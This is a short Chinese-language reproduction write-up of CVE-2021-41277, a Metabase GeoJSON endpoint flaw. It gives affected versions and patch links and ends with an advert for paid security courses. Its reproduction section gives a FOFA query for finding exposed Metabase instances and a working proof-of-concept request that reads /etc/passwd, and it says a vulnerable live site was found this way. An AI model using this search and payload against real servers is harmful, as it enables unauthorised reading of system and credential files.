一、漏洞简介
metabase 是一个简单、开源的数据分析平台。
CVE-2021-41277
在受影响的版本中,自定义 GeoJSON 地图(admin->settings->maps->custom maps->add a map)操作缺少权限验证,攻击者可通过该漏洞获得敏感信息。
该漏洞CVSS评分:9.9,危害等级:严重
二、影响版本
影响版本:
metabase version < 0.40.5
metabase version >= 1.0.0, < 1.40.5
修复版本:
metabase version >= 0.40.5
metabase version >= 1.40.5
三、漏洞复现
1、fofa搜索 app="Metabase"
2、POC验证
POC:
/api/geojson?url=file:/etc/passwd
如下图所示,找到一个存在漏洞的网站
四、漏洞修复
1、参考漏洞影响范围,及时升级至最新安全版本:https://github.com/metabase/metabase
2、目前厂商已发布升级补丁以修复漏洞,补丁获取链接:
https://github.com/metabase/metabase/security/advisories/GHSA-w73v-6p7p-fpfr
更多资源:
1、web安全工具、渗透测试工具
2、存在漏洞的网站源码与代码审计+漏洞复现教程、
3、渗透测试学习视频、应急响应学习视频、代码审计学习视频、都是2019-2021年期间的较新视频
4、应急响应真实案例复现靶场与应急响应教程
收集整理在知识星球,可加入知识星球进行查看。也可搜索关注微信公众号:W小哥